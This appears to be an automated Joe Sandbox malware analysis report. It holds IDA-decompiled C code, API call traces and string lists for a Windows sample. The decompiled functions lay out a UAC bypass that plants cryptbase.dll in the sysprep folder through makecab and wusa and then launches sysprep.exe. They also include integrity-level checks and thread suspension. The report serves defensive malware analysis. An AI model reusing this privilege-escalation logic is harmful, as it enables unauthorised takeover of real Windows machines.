    						if(E00DB20EC( &_v556) != 0 && E00DB3B50( &_v556, "\\uxtheme.dll") != 0) {
    							goto L38;
    						}
    						_a12 = _a12 + 1;
    						if(_a12 < 0xffff) {
    							continue;
    						}
    						_a12 = 0xc001;
    						while(RegisterWindowMessageA( &_v296) != 0) {
    							_a12 = _a12 + 1;
    							if(_a12 < 0xffff) {
    								continue;
    							}
    							goto L30;
    						}
    						goto L34;
    					}
    				}
    			}






























    0x00db3158
    0x00db315b
    0x00db315d
    0x00db3160
    0x00db3163
    0x00db3173
    0x00db3192
    0x00db31a5
    0x00db31c0
    0x00db31cd
    0x00db31d5
    0x00db31dc
    0x00db31e2
    0x00db31e7
    0x00db31f0
    0x00db31f6
    0x00db31fa
    0x00db3210
    0x00db3214
    0x00db3219
    0x00db3220
    0x00db3225
    0x00000000
    0x00db322d
    0x00000000
    0x00db322d
    0x00db3225
    0x00db3234
    0x00db3234
    0x00db3239
    0x00db3243
    0x00db3251
    0x00db3265
    0x00db327c
    0x00db3281
    0x00db3284
    0x00db3284
    0x00db3297
    0x00db329d
    0x00db32a0
    0x00db32a5
    0x00db32a5
    0x00db32a0
    0x00db32a8
    0x00db32a9
    0x00db32b7
    0x00db34e5
    0x00000000
    0x00db34e5
    0x00db32bd
    0x00db32c0
    0x00db32c3
    0x00db32dc
    0x00000000
    0x00000000
    0x00db32ff
    0x00db3305
    0x00db330f
    0x00db3311
    0x00db3332
    0x00db3338
    0x00db3349
    0x00db3349
    0x00db335f
    0x00db3361
    0x00db3361
    0x00db335f
    0x00db3375
    0x00db337c
    0x00db337e
    0x00db337e
    0x00db3384
    0x00db338e
    0x00db3398
    0x00db3434
    0x00db343b
    0x00db3447
    0x00db343d
    0x00db343d
    0x00db343d
    0x00db3456
    0x00db345c
    0x00db3461
    0x00db3479
    0x00db347b
    0x00db347b
    0x00db3485
    0x00db3493
    0x00db3495
    0x00db34b6
    0x00db34cd
    0x00db34df
    0x00db3463
    0x00db3463
    0x00db3463
    0x00db3463
    0x00000000
    0x00db3461
    0x00db33ab
    0x00000000
    0x00000000
    0x00db33b1
    0x00db33b8
    0x00db33c2
    0x00db33d2
    0x00db33e6
    0x00000000
    0x00000000
    0x00db3403
    0x00db340d
    0x00000000
    0x00000000
    0x00db340f
    0x00db3416
    0x00db3428
    0x00db3432
    0x00000000
    0x00000000
    0x00000000
    0x00db3432
    0x00000000
    0x00db3416
    0x00db33b8

    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00DB315B
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB3173
    • GetTempPathA.KERNEL32(00000104,?), ref: 00DB31A5
    • GetTempPathA.KERNEL32(00000104,?), ref: 00DB31CD
    • GetTickCount.KERNEL32 ref: 00DB31CF
    • _strlen.LIBCMT ref: 00DB31E2
    • wsprintfA.USER32 ref: 00DB31F0
    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00DB3207
    • GetProcAddress.KERNEL32(00000000), ref: 00DB320A
    • GetCurrentProcess.KERNEL32(00000000), ref: 00DB321A
      • Part of subcall function 00DB20CE: _memset.LIBCMT ref: 00DB20E1
    • GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB3251
      • Part of subcall function 00DB250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
      • Part of subcall function 00DB250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
      • Part of subcall function 00DB250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
      • Part of subcall function 00DB250C: ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
      • Part of subcall function 00DB250C: CloseHandle.KERNEL32(00000000), ref: 00DB2583
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C
      • Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00DB2F9E
      • Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FA5
      • Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00DB2FB7
      • Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FBE
      • Part of subcall function 00DB2F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00DB2E88,?,?,?,?), ref: 00DB3043
      • Part of subcall function 00DB2F02: GetLastError.KERNEL32 ref: 00DB3055
    • GetTempPathA.KERNEL32(00000104,?), ref: 00DB330F
    • GetTickCount.KERNEL32 ref: 00DB3311
    • _strlen.LIBCMT ref: 00DB3324
    • wsprintfA.USER32 ref: 00DB3332
    • MoveFileA.KERNEL32(?,?), ref: 00DB3349
      • Part of subcall function 00DB24AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB24BF
      • Part of subcall function 00DB24AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00DB24DB
      • Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24E8
      • Part of subcall function 00DB24AA: FlushFileBuffers.KERNEL32(00000000), ref: 00DB24EF
      • Part of subcall function 00DB24AA: CloseHandle.KERNEL32(00000000), ref: 00DB24F6
      • Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24FE
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB3384
    • CopyFileA.KERNEL32(?,?,00000000), ref: 00DB34DF
      • Part of subcall function 00DB3065: RegisterClassExA.USER32(?), ref: 00DB30A4
      • Part of subcall function 00DB3065: UnregisterClassA.USER32(?,?), ref: 00DB30B4
    • GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB33D2
    • RegisterWindowMessageA.USER32(?,?), ref: 00DB341D
      • Part of subcall function 00DB27DD: GetVersionExA.KERNEL32(?), ref: 00DB27F7
      • Part of subcall function 00DB27DD: GetLastError.KERNEL32 ref: 00DB2818
    • LockWorkStation.USER32 ref: 00DB343D
      • Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB30FF
      • Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB3114
      • Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB3127
      • Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB313A
    • CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00DB3456
    • GetLastError.KERNEL32 ref: 00DB3463
    • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00DB3471
    • CloseHandle.KERNEL32(00000000), ref: 00DB3485
    • GetTempPathA.KERNEL32(00000104,?), ref: 00DB3493
    • GetTickCount.KERNEL32 ref: 00DB3495
    • _strlen.LIBCMT ref: 00DB34A8
    • wsprintfA.USER32 ref: 00DB34B6
    • MoveFileA.KERNEL32(?,?), ref: 00DB34CD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: File$ErrorLast$Handle$InputModulePathSendTemp$AddressCloseCountCreateProcTick_strlenwsprintf$ClassClipboardFormatLocalMoveNameRegister$AllocBuffersCheckCopyCurrentDirectoryEventFlushFreeLockMappedMessageObjectProcessReadSingleSizeStationSystemUnregisterVersionWaitWindowWorkWrite_memset
    • String ID: Global\AtomFun$IsWow64Process$\%.8x.tmp$\uxtheme.dll$kernel32.dll
    • API String ID: 1235156964-746268175
    • Opcode ID: c8fb400b813e383541aa9bac0a3aa128283ba7448c65547d093e1a0f28384e90
    • Instruction ID: f0923e5ec51edb32644d634f11a714fe9761bcc1d3d6be356522af35f9013d75
    • Opcode Fuzzy Hash: c8fb400b813e383541aa9bac0a3aa128283ba7448c65547d093e1a0f28384e90
    • Instruction Fuzzy Hash: 28A1E476800219EADF21AFA4DC59AEE77BCEF08340F5405A6F506E2150EB74DB94DB70
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00DB2BDC(void* __ebx) {
    				intOrPtr _t71;
    				long _t74;
    				void* _t135;
    				void* _t143;
    				int _t152;
    				intOrPtr* _t154;
    				signed int _t155;
    				void* _t159;
    				void* _t161;
    
    				_t135 = __ebx;
    				_t159 = _t161 - 0x6c;
    				 *((intOrPtr*)(_t159 + 0x5c)) = 0;
    				 *((intOrPtr*)(_t159 + 0x60)) = 0;
    				_t154 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
    				if(_t154 != 0) {
    					 *_t154(GetCurrentProcess(), _t159 + 0x60);
    				}
    				 *(_t159 - 0x38) = 0x94;
    				_t155 = 0 |  *((intOrPtr*)(_t159 + 0x60)) == 0x00000000;
    				if(GetVersionExA(_t159 - 0x38) == 0) {
    					GetLastError();
    					goto L23;
    				} else {
    					if( *((intOrPtr*)(_t159 - 0x28)) != 2 ||  *((intOrPtr*)(_t159 - 0x34)) != 6 ||  *((intOrPtr*)(_t159 - 0x30)) != 1 &&  *((intOrPtr*)(_t159 - 0x30)) != 2) {
    						_t155 = 0;
    					}
    					if(_t155 == 0) {
    						L23:
    						_t71 = 0;
    						goto L24;
    					} else {
    						GetTempPathA(0x104, _t159 - 0x240);
    						_t74 = GetTickCount();
    						wsprintfA(_t159 + E00DB3620(_t159 - 0x240) - 0x240, "\\%.8x.tmp", _t74);
    						if(E00DB24AA(_t159 - 0x240,  *((intOrPtr*)(_t159 + 0x74)),  *(_t159 + 0x78)) == 0) {
    							goto L23;
    						}
    						GetSystemDirectoryA(_t159 - 0x54c, 0x104);
    						E00DB3A60(_t159 - 0x54c, "\\cryptbase.dll");
    						GetTempPathA(0x104, _t159 - 0x344);
    						E00DB3A60(_t159 - 0x344, "\\cryptbase.dll");
    						 *(_t159 + 0x68) =  *(_t159 + 0x68) & 0x00000000;
    						 *(_t159 + 0x64) =  *(_t159 + 0x64) & 0x00000000;
    						_t143 = _t135;
    						if(E00DB250C(_t143, _t159 - 0x54c, _t159 + 0x68, _t159 + 0x64) != 0) {
    							if(E00DB2F02( *(_t159 + 0x68),  *(_t159 + 0x64), _t159 - 0x240,  *((intOrPtr*)(_t159 + 0x7c))) != 0 && E00DB24AA(_t159 - 0x344,  *(_t159 + 0x68),  *(_t159 + 0x64)) != 0) {
    								GetTempPathA(0x104, _t159 - 0x13c);
    								E00DB3A60(_t159 - 0x13c, "\\cryptbase.msu");
    								DeleteFileA(_t159 - 0x13c);
    								_push(_t159 - 0x13c);
    								E00DB2AF9(0, "makecab.exe /V1 %s %s", _t159 - 0x344);
    								if(E00DB259B(_t159 - 0x13c) != 0) {
    									_t152 = 0x103;
    									GetWindowsDirectoryA(_t159 - 0x650, _t152);
    									E00DB3A60(_t159 - 0x650, "\\system32\\sysprep\\sysprep.exe");
    									GetWindowsDirectoryA(_t159 - 0x448, _t152);
    									E00DB3A60(_t159 - 0x448, "\\system32\\sysprep\\cryptbase.dll");
    									E00DB2AF9(0, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\system32\\sysprep", _t159 - 0x13c);
    									if(E00DB259B(_t159 - 0x448) != 0) {
    										 *(_t159 + 0x78) =  *(_t159 + 0x78) & 0x00000000;
    										if(E00DB2AF9(_t159 + 0x78, "cmd.exe /C %s", _t159 - 0x650) != 0 &&  *(_t159 + 0x78) == 0x50574e44) {
    											 *((intOrPtr*)(_t159 + 0x5c)) = 1;
    										}
    										DeleteFileA(_t159 - 0x448);
    									}
    									DeleteFileA(_t159 - 0x13c);
    								}
    							}
    							LocalFree( *(_t159 + 0x68));
    						}
    						DeleteFileA(_t159 - 0x344);
    						DeleteFileA(_t159 - 0x240);
    						_t71 =  *((intOrPtr*)(_t159 + 0x5c));
    						L24:
    						return _t71;
    					}
    				}
    			}












    0x00db2bdc
    0x00db2bdd
    0x00db2bf5
    0x00db2bf8
    0x00db2c08
    0x00db2c0c
    0x00db2c19
    0x00db2c19
    0x00db2c20
    0x00db2c2a
    0x00db2c38
    0x00db2e77
    0x00000000
    0x00db2c3e
    0x00db2c42
    0x00db2c56
    0x00db2c56
    0x00db2c5a
    0x00db2e7d
    0x00db2e7d
    0x00000000
    0x00db2c60
    0x00db2c73
    0x00db2c75
    0x00db2c96
    0x00db2cb3
    0x00000000
    0x00000000
    0x00db2cc2
    0x00db2cd5
    0x00db2ce4
    0x00db2cee
    0x00db2cf3
    0x00db2cf7
    0x00db2cfc
    0x00db2d19
    0x00db2d36
    0x00db2d5e
    0x00db2d6c
    0x00db2d7a
    0x00db2d82
    0x00db2d91
    0x00db2da7
    0x00db2dad
    0x00db2dbe
    0x00db2dcc
    0x00db2ddb
    0x00db2de9
    0x00db2dfc
    0x00db2e12
    0x00db2e14
    0x00db2e32
    0x00db2e3d
    0x00db2e3d
    0x00db2e4b
    0x00db2e4b
    0x00db2e54
    0x00db2e54
    0x00db2da7
    0x00db2e59
    0x00db2e59
    0x00db2e66
    0x00db2e6f
    0x00db2e71
    0x00db2e7f
    0x00db2e85
    0x00db2e85
    0x00db2c5a

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00DB2BFB
    • GetProcAddress.KERNEL32(00000000), ref: 00DB2C02
    • GetCurrentProcess.KERNEL32(?), ref: 00DB2C12
    • GetVersionExA.KERNEL32(?), ref: 00DB2C30
    • GetTempPathA.KERNEL32(00000104,?), ref: 00DB2C73
    • GetTickCount.KERNEL32 ref: 00DB2C75
    • _strlen.LIBCMT ref: 00DB2C88
    • wsprintfA.USER32 ref: 00DB2C96
      • Part of subcall function 00DB24AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB24BF
      • Part of subcall function 00DB24AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00DB24DB
      • Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24E8
      • Part of subcall function 00DB24AA: FlushFileBuffers.KERNEL32(00000000), ref: 00DB24EF
      • Part of subcall function 00DB24AA: CloseHandle.KERNEL32(00000000), ref: 00DB24F6
      • Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24FE
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB2CC2
    • GetTempPathA.KERNEL32(00000104,?), ref: 00DB2CE4
      • Part of subcall function 00DB250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
      • Part of subcall function 00DB250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
      • Part of subcall function 00DB250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
      • Part of subcall function 00DB250C: ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
      • Part of subcall function 00DB250C: CloseHandle.KERNEL32(00000000), ref: 00DB2583
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C
    • DeleteFileA.KERNEL32(?), ref: 00DB2E6F
      • Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00DB2F9E
      • Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FA5
      • Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00DB2FB7
      • Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FBE
      • Part of subcall function 00DB2F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00DB2E88,?,?,?,?), ref: 00DB3043
      • Part of subcall function 00DB2F02: GetLastError.KERNEL32 ref: 00DB3055
    • GetTempPathA.KERNEL32(00000104,?), ref: 00DB2D5E
    • DeleteFileA.KERNEL32(?), ref: 00DB2D7A
      • Part of subcall function 00DB2AF9: LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00DB2B25
      • Part of subcall function 00DB2AF9: _memset.LIBCMT ref: 00DB2B4D
      • Part of subcall function 00DB2AF9: _memset.LIBCMT ref: 00DB2B5B
      • Part of subcall function 00DB2AF9: GetStartupInfoA.KERNEL32(?), ref: 00DB2B6A
      • Part of subcall function 00DB2AF9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00DB2D96), ref: 00DB2B8C
      • Part of subcall function 00DB2AF9: WaitForSingleObject.KERNEL32(00DB2D96,000000FF), ref: 00DB2B9B
      • Part of subcall function 00DB2AF9: GetExitCodeProcess.KERNEL32(00DB2D96,?), ref: 00DB2BAC
      • Part of subcall function 00DB2AF9: CloseHandle.KERNEL32(00000000), ref: 00DB2BBB
      • Part of subcall function 00DB2AF9: CloseHandle.KERNEL32(00DB2D96), ref: 00DB2BC0
      • Part of subcall function 00DB2AF9: GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00DB2BC7
      • Part of subcall function 00DB2AF9: LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00DB2BCE
      • Part of subcall function 00DB259B: FindFirstFileA.KERNEL32(00DB2DA5,?,00000104), ref: 00DB25B1
      • Part of subcall function 00DB259B: FindClose.KERNEL32(00000000), ref: 00DB25BE
    • GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00DB2DBE
    • GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00DB2DDB
    • DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E4B
    • DeleteFileA.KERNEL32(?,?), ref: 00DB2E54
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00DB2E59
    • DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E66
    • GetLastError.KERNEL32 ref: 00DB2E77
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: File$ErrorLast$Handle$CloseDelete$Local$AddressCreateDirectoryModulePathProcProcessTemp$AllocFindFreeWindows_memset$BuffersCheckCodeCountCurrentExitFirstFlushInfoMappedObjectReadSingleSizeStartupSystemTickVersionWaitWrite_strlenwsprintf
    • String ID: DNWP$IsWow64Process$\%.8x.tmp$\cryptbase.dll$\cryptbase.msu$\system32\sysprep\cryptbase.dll$\system32\sysprep\sysprep.exe$cmd.exe /C %s$cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep$kernel32.dll$makecab.exe /V1 %s %s
    • API String ID: 1577429191-2259624556
    • Opcode ID: 4291e57a812c7cb681b26c29072b746389cbc57a170e9e250cb45bffa2b9e552
    • Instruction ID: 322e40167643d490e0b702fa81d750bbb82408fd1b088181695d9a5a5e04201c
    • Opcode Fuzzy Hash: 4291e57a812c7cb681b26c29072b746389cbc57a170e9e250cb45bffa2b9e552
    • Instruction Fuzzy Hash: 9A71FD7790021CEADB21EBA4DC89AEE77ACEB04341F540556F90AE2150E734DA88CF74
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00DB1E99(void* _a8) {
    				char _v264;
    				void* _t22;
    				void* _t25;
    				void* _t27;
    				void* _t33;
    				void* _t40;
    
    				_t55 = _a8 != 1;
    				if(_a8 != 1) {
    					L9:
    					return 1;
    				}
    				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
    				GetCurrentProcessId();
    				E00DB21BB( &_v264);
    				_t22 = E00DB3590(E00DB25CB(_t55,  &_v264), "utilman.exe");
    				_t56 = _t22;
    				if(_t22 == 0) {
    					L10:
    					_t40 = OpenEventA(2, 0, "Global\\AtomFun");
    					__eflags = _t40;
    					if(_t40 == 0) {
    						GetLastError();
    					} else {
    						SetEvent(_t40);
    						CloseHandle(_t40);
    					}
    					_t25 = E00DB27DD();
    					__eflags = _t25;
    					if(_t25 != 0) {
    						_t27 = E00DB2822(GetCurrentProcessId());
    						__eflags = _t27;
    						if(_t27 > 0) {
    							E00DB1C33(_t27, 0);
    						}
    					}
    					L16:
    					_push(0);
    					L7:
    					ExitProcess();
    				}
    				_t33 = E00DB3590(E00DB25CB(_t56,  &_v264), "logonui.exe");
    				_t57 = _t33;
    				if(_t33 == 0) {
    					goto L10;
    				}
    				if(E00DB3590(E00DB25CB(_t57,  &_v264), "sysprep.exe") != 0) {
    					goto L9;
    				}
    				_push( &_a8);
    				_a8 = 0;
    				_push(GetCurrentProcess());
    				if(E00DB289C() == 0 || _a8 < 0x3000) {
    					goto L16;
    				} else {
    					_push(0x50574e44);
    					goto L7;
    				}
    			}









    0x00db1ea5
    0x00db1ea6
    0x00db1f62
    0x00db1f66
    0x00db1f66
    0x00db1ec4
    0x00db1ed0
    0x00db1ed9
    0x00db1ef0
    0x00db1ef7
    0x00db1ef9
    0x00db1f69
    0x00db1f77
    0x00db1f79
    0x00db1f7b
    0x00db1f8d
    0x00db1f7d
    0x00db1f7e
    0x00db1f85
    0x00db1f85
    0x00db1f93
    0x00db1f98
    0x00db1f9a
    0x00db1f9f
    0x00db1fa4
    0x00db1fa6
    0x00db1faa
    0x00db1faa
    0x00db1fa6
    0x00db1faf
    0x00db1faf
    0x00db1f5a
    0x00db1f5a
    0x00db1f5a
    0x00db1f0d
    0x00db1f14
    0x00db1f16
    0x00000000
    0x00000000
    0x00db1f33
    0x00000000
    0x00db1f61
    0x00db1f38
    0x00db1f39
    0x00db1f42
    0x00db1f4a
    0x00000000
    0x00db1f55
    0x00db1f55
    0x00000000
    0x00db1f55

    APIs
    • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?), ref: 00DB1EBD
    • GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00DB1EC4
    • GetCurrentProcessId.KERNEL32(?,?), ref: 00DB1ED0
      • Part of subcall function 00DB25CB: _strlen.LIBCMT ref: 00DB25D7
      • Part of subcall function 00DB25CB: _strlen.LIBCMT ref: 00DB25F2
    • GetCurrentProcess.KERNEL32(?,sysprep.exe,logonui.exe,utilman.exe,?,?,?), ref: 00DB1F3C
      • Part of subcall function 00DB289C: _memset.LIBCMT ref: 00DB28CA
      • Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00DB28DF
      • Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?), ref: 00DB28F0
      • Part of subcall function 00DB289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00DB290D
      • Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00DB292F
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB293B
      • Part of subcall function 00DB289C: LocalAlloc.KERNEL32(00000040,?), ref: 00DB2947
      • Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00DB2960
      • Part of subcall function 00DB289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DB2968
      • Part of subcall function 00DB289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DB2978
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB298B
      • Part of subcall function 00DB289C: LocalFree.KERNEL32(00000000), ref: 00DB2992
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299A
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299E
      • Part of subcall function 00DB289C: CloseHandle.KERNEL32(?), ref: 00DB29A7
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB29AF
    • ExitProcess.KERNEL32 ref: 00DB1F5A
    • OpenEventA.KERNEL32(00000002,00000000,Global\AtomFun,utilman.exe,?,?,?), ref: 00DB1F71
    • SetEvent.KERNEL32(00000000,?,?), ref: 00DB1F7E
    • CloseHandle.KERNEL32(00000000), ref: 00DB1F85
    • GetLastError.KERNEL32(?,?), ref: 00DB1F8D
      • Part of subcall function 00DB27DD: GetVersionExA.KERNEL32(?), ref: 00DB27F7
      • Part of subcall function 00DB27DD: GetLastError.KERNEL32 ref: 00DB2818
    • GetCurrentProcessId.KERNEL32(?,?), ref: 00DB1F9C
      • Part of subcall function 00DB2822: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DB2832
      • Part of subcall function 00DB2822: Process32First.KERNEL32(00000000,?), ref: 00DB2850
      • Part of subcall function 00DB2822: Process32Next.KERNEL32(00000000,00000128), ref: 00DB286C
      • Part of subcall function 00DB2822: GetLastError.KERNEL32(00000000,7622D965), ref: 00DB287F
      • Part of subcall function 00DB2822: CloseHandle.KERNEL32(00000000), ref: 00DB2886
      • Part of subcall function 00DB2822: GetLastError.KERNEL32(00000000,7622D965), ref: 00DB288E
      • Part of subcall function 00DB1C33: CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00DB1C43
      • Part of subcall function 00DB1C33: Thread32First.KERNEL32(00000000,?), ref: 00DB1C66
      • Part of subcall function 00DB1C33: OpenThread.KERNEL32(00000002,00000000,00DB1FAF,7622D965,00000000,00000004,?,00000000), ref: 00DB1C91
      • Part of subcall function 00DB1C33: SuspendThread.KERNEL32(00000000), ref: 00DB1C9E
      • Part of subcall function 00DB1C33: CloseHandle.KERNEL32(00000000), ref: 00DB1CAD
      • Part of subcall function 00DB1C33: Thread32Next.KERNEL32(00000000,0000001C), ref: 00DB1CB4
      • Part of subcall function 00DB1C33: GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00DB1CC0
      • Part of subcall function 00DB1C33: CloseHandle.KERNEL32(00000000), ref: 00DB1CC7
      • Part of subcall function 00DB1C33: GetLastError.KERNEL32(00000004,?,00000000,?,?,00DB1FAF,00000000,00000000,00000000), ref: 00DB1CCC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLast$Handle$CloseProcess$CurrentOpenTokenVersion$AuthorityCreateEventFirstInformationLocalModuleNextProcess32SnapshotThreadThread32Toolhelp32_strlen$AllocCountExitFileFreeNameSuspend_memset
    • String ID: Global\AtomFun$logonui.exe$sysprep.exe$utilman.exe
    • API String ID: 1416955679-3994176926
    • Opcode ID: 65f295e755ab49bfe224f478e3c94a4c31fc997efe8515d01b1ef77c04d21abc
    • Instruction ID: 4f84e35c8a1c1bfcf1da8db2309bf1bd0a0e4a8d5940f041171a214206c39252
    • Opcode Fuzzy Hash: 65f295e755ab49bfe224f478e3c94a4c31fc997efe8515d01b1ef77c04d21abc
    • Instruction Fuzzy Hash: 89215C7F904304EACB20BBB59D6EEEE37ACDF48390B944515B647D2145EB74C684CA30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00DB1CDA(void* __ecx) {
    				void* __ebx;
    				void* _t56;
    				void* _t58;
    				void* _t80;
    				void* _t84;
    				void* _t86;
    				void* _t97;
    				void* _t99;
    
    				_t86 = __ecx;
    				_t97 = _t99 - 0x78;
    				_t84 = E00DB29C6();
    				E00DB3510(_t97 - 0x40, 0, 0x9c);
    				 *(_t97 - 0x40) = 0x9c;
    				if(GetVersionExA(_t97 - 0x40) != 0) {
    					L2:
    					 *((intOrPtr*)(_t97 + 0x60)) = 0;
    					if( *((intOrPtr*)(_t97 - 0x3c)) < 6) {
    						L4:
    						GetCommandLineA();
    						_push(_t97 + 0x64);
    						_push(_t97 + 0x68);
    						_push(_t97 + 0x6c);
    						_push(_t97 + 0x5c);
